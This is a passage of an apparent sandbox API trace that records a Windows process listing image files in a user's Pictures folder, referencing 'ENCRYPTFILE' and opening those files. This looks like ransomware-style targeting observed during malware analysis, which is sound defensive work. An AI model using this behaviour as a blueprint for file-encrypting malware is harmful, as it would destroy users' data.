ftLastAccessTime.dwLowDateTime=0x603183b0, ftLastAccessTime.dwHighDateTime=0x1d5ee5b, ftLastWriteTime.dwLowDateTime=0x603183b0, ftLastWriteTime.dwHighDateTime=0x1d5ee5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca358, cFileName="..", cAlternateFileName="")) returned 1 [0091.915] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeffcc610, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0x43e05300, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x43e05300, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x43ca358, cFileName="-3KPTEtzyngOb.bmp", cAlternateFileName="-3KPTE~1.BMP")) returned 1 [0091.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0091.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0091.916] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d5b00, ftCreationTime.dwHighDateTime=0x1d5e47f, ftLastAccessTime.dwLowDateTime=0xa9a111f0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0xa9a111f0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0x14b8d, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="6EeiE520t8A11Pm.jpg", cAlternateFileName="6EEIE5~1.JPG")) returned 1 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0091.916] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8926ac0, ftCreationTime.dwHighDateTime=0x1d5f077, ftLastAccessTime.dwLowDateTime=0x260c180, ftLastAccessTime.dwHighDateTime=0x1d5e6a7, ftLastWriteTime.dwLowDateTime=0x260c180, ftLastWriteTime.dwHighDateTime=0x1d5e6a7, nFileSizeHigh=0x0, nFileSizeLow=0x6f4b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="7mFkSCM1jm586Ad_.png", cAlternateFileName="7MFKSC~1.PNG")) returned 1 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0091.916] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2e8c0, ftCreationTime.dwHighDateTime=0x1d5e92b, ftLastAccessTime.dwLowDateTime=0x172e55b0, ftLastAccessTime.dwHighDateTime=0x1d5ee4e, ftLastWriteTime.dwLowDateTime=0x172e55b0, ftLastWriteTime.dwHighDateTime=0x1d5ee4e, nFileSizeHigh=0x0, nFileSizeLow=0xc713, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="7yKccLuS8OBSzjABi0L.bmp", cAlternateFileName="7YKCCL~1.BMP")) returned 1 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0091.916] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382517a0, ftCreationTime.dwHighDateTime=0x1d5eb00, ftLastAccessTime.dwLowDateTime=0x417af580, ftLastAccessTime.dwHighDateTime=0x1d5ef7f, ftLastWriteTime.dwLowDateTime=0x417af580, ftLastWriteTime.dwHighDateTime=0x1d5ef7f, nFileSizeHigh=0x0, nFileSizeLow=0x9ea4, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="9Y-cpSQgv6l3vMS-rl5.png", cAlternateFileName="9Y-CPS~1.PNG")) returned 1 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0091.916] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83d02bf0, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0xfc322800, ftLastAccessTime.dwHighDateTime=0x1d5ebae, ftLastWriteTime.dwLowDateTime=0xfc322800, ftLastWriteTime.dwHighDateTime=0x1d5ebae, nFileSizeHigh=0x0, nFileSizeLow=0x10cae, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="AsLbgf0HCR8rP.jpg", cAlternateFileName="ASLBGF~1.JPG")) returned 1 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0091.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0091.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa782600, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0x58d6c440, ftLastAccessTime.dwHighDateTime=0x1d5ee97, ftLastWriteTime.dwLowDateTime=0x58d6c440, ftLastWriteTime.dwHighDateTime=0x1d5ee97, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="bflIcpkmQtP.png", cAlternateFileName="BFLICP~1.PNG")) returned 1 [0091.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0091.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0091.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea366e0, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xfb8a48f0, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0xfb8a48f0, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x4807, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="EWWH.png", cAlternateFileName="")) returned 1 [0091.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3fff20, ftCreationTime.dwHighDateTime=0x1d5f02d, ftLastAccessTime.dwLowDateTime=0x3197eae0, ftLastAccessTime.dwHighDateTime=0x1d5ee7d, ftLastWriteTime.dwLowDateTime=0x3197eae0, ftLastWriteTime.dwHighDateTime=0x1d5ee7d, nFileSizeHigh=0x0, nFileSizeLow=0x244f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="fgq5EW8t8.jpg", cAlternateFileName="FGQ5EW~1.JPG")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51874400, ftCreationTime.dwHighDateTime=0x1d5e602, ftLastAccessTime.dwLowDateTime=0x470c54d0, ftLastAccessTime.dwHighDateTime=0x1d5e8db, ftLastWriteTime.dwLowDateTime=0x470c54d0, ftLastWriteTime.dwHighDateTime=0x1d5e8db, nFileSizeHigh=0x0, nFileSizeLow=0x541d, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="J06YyOv018ZbSPW7yM.png", cAlternateFileName="J06YYO~1.PNG")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37446c80, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0x8aa363d0, ftLastAccessTime.dwHighDateTime=0x1d5e73e, ftLastWriteTime.dwLowDateTime=0x8aa363d0, ftLastWriteTime.dwHighDateTime=0x1d5e73e, nFileSizeHigh=0x0, nFileSizeLow=0xf6d5, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="maAjSjcXjKdUlEc2T.bmp", cAlternateFileName="MAAJSJ~1.BMP")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae77f70, ftCreationTime.dwHighDateTime=0x1d5e5bc, ftLastAccessTime.dwLowDateTime=0xf924a990, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0xf924a990, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0xc97b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="OjV9.png", cAlternateFileName="")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f70a7d0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xd4154c50, ftLastAccessTime.dwHighDateTime=0x1d5eda5, ftLastWriteTime.dwLowDateTime=0xd4154c50, ftLastWriteTime.dwHighDateTime=0x1d5eda5, nFileSizeHigh=0x0, nFileSizeLow=0xf2e9, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="W ZDfbD_wanSc.gif", cAlternateFileName="WZDFBD~1.GIF")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d69400, ftCreationTime.dwHighDateTime=0x1d5ee87, ftLastAccessTime.dwLowDateTime=0xcb7e1b10, ftLastAccessTime.dwHighDateTime=0x1d5efeb, ftLastWriteTime.dwLowDateTime=0xcb7e1b10, ftLastWriteTime.dwHighDateTime=0x1d5efeb, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="X0f8JSrsqtdBsB.png", cAlternateFileName="X0F8JS~1.PNG")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8d33d0, ftCreationTime.dwHighDateTime=0x1d5ede1, ftLastAccessTime.dwLowDateTime=0xc1008940, ftLastAccessTime.dwHighDateTime=0x1d5e8ff, ftLastWriteTime.dwLowDateTime=0xc1008940, ftLastWriteTime.dwHighDateTime=0x1d5e8ff, nFileSizeHigh=0x0, nFileSizeLow=0x1089f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Z3f-n12Dk_aAtm.jpg", cAlternateFileName="Z3F-N1~1.JPG")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b717770, ftCreationTime.dwHighDateTime=0x1d5e73f, ftLastAccessTime.dwLowDateTime=0xdce5a1d0, ftLastAccessTime.dwHighDateTime=0x1d5e252, ftLastWriteTime.dwLowDateTime=0xdce5a1d0, ftLastWriteTime.dwHighDateTime=0x1d5e252, nFileSizeHigh=0x0, nFileSizeLow=0x123f1, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="z6qa.jpg", cAlternateFileName="")) returned 1 [0091.917] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2440, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xb, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="視мńဓ+\x10")) returned 0 [0091.917] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0091.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|-3KPTEtzyngOb.bmp|6EeiE520t8A11Pm.jpg|7mFkSCM1jm586Ad_.png|7yKccLuS8OBSzjABi0L.bmp|9Y-cpSQgv6l3vMS-rl5.png|AsLbgf0HCR8rP.jpg|bflIcpkmQtP.png|EWWH.png|fgq5EW8t8.jpg|J06YyOv018ZbSPW7yM.png|maAjSjcXjKdUlEc2T.bmp|OjV9.png|W ZDfbD_wanSc.gif|X0f8JSrsqtdBsB.png|Z3f-n12Dk_aAtm.jpg|z6qa.jpg", cchCount1=283, lpString2="", cchCount2=0) returned 3 [0091.918] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0091.918] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeffcc610, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0x43e05300, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x43e05300, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="-3KPTEtzyngOb.bmp", cAlternateFileName="-3KPTE~1.BMP")) returned 0x41ac100 [0091.918] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0091.918] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0091.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0091.919] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.920] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0091.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0091.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0091.922] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0091.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0091.922] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0091.923] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\-3kptetzyngob.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 